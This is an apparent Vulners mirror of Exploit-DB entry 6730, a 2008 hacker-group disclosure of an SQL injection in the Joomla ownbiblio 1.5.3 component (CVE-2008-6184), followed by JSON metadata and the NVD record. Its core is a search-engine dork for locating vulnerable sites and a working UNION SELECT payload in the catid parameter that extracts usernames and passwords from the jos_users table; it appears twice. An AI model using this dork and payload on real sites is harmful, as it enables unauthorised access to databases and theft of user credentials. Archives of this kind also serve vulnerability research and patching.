Search...

Joomla Component ownbiblio 1.5.3 catid SQL Injection Vulnerability

2008-10-11T00:00:00

ID EDB-ID:6730
Type exploitdb
Reporter H!tm@N
Modified 2008-10-11T00:00:00

Description

Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability. CVE-2008-6184. Webapps exploit for php platform

                                        
                                            #############################################################################
#							                    #
#          Joomla Component Ownbiblio SQL Injection Vulnerability           #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Ownbiblio (com_ownbiblio)"
[~] Version:       "1.5.3" 
[~] Author:        "Sebastian Kruvinnus, Michael Kehrwecker"

########################################

[~] DORK: inurl:"com_ownbiblio" catalogue

########################################

[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]
[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2008-10-11]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:6730", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla Component ownbiblio 1.5.3 catid SQL Injection Vulnerability", "description": "Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability. CVE-2008-6184. Webapps exploit for php platform", "published": "2008-10-11T00:00:00", "modified": "2008-10-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6730/", "reporter": "H!tm@N", "references": [], "cvelist": ["CVE-2008-6184"], "lastseen": "2016-02-01T01:30:53", "viewCount": 11, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-02-01T01:30:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6184"]}], "modified": "2016-02-01T01:30:53", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://www.exploit-db.com/download/6730/", "sourceData": "#############################################################################\n#\t\t\t\t\t\t\t #\n# Joomla Component Ownbiblio SQL Injection Vulnerability #\n#\t\t\t\t\t\t\t #\n#############################################################################\n\n\n########################################\n\n[~] Vulnerability found by: H!tm@N\n[~] Contact: hitman[at]khg-crew[dot]ws\n[~] Site: www.khg-crew.ws\n[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]\n\n########################################\n\n[~] ScriptName: \"Joomla\"\n[~] Component: \"Ownbiblio (com_ownbiblio)\"\n[~] Version: \"1.5.3\" \n[~] Author: \"Sebastian Kruvinnus, Michael Kehrwecker\"\n\n########################################\n\n[~] DORK: inurl:\"com_ownbiblio\" catalogue\n\n########################################\n\n[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]\n[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--\n\n########################################\n\n[~] Proud 2 be Albanian\n[~] Proud 2 be Muslim\n[~] United States of Albania\n\n########################################\n\n# milw0rm.com [2008-10-11]\n", "osvdbidlist": ["49109"]}

{"cve": [{"lastseen": "2020-10-03T11:51:05", "description": "SQL injection vulnerability in the OwnBiblio (com_ownbiblio) component 1.5.3 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a catalogue action to index.php.", "edition": 3, "cvss3": {}, "published": "2009-02-19T18:30:00", "title": "CVE-2008-6184", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6184"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:medialab-karlsruhe:ownbiblio:1.5.3"], "id": "CVE-2008-6184", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6184", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:medialab-karlsruhe:ownbiblio:1.5.3:*:*:*:*:*:*:*"]}]}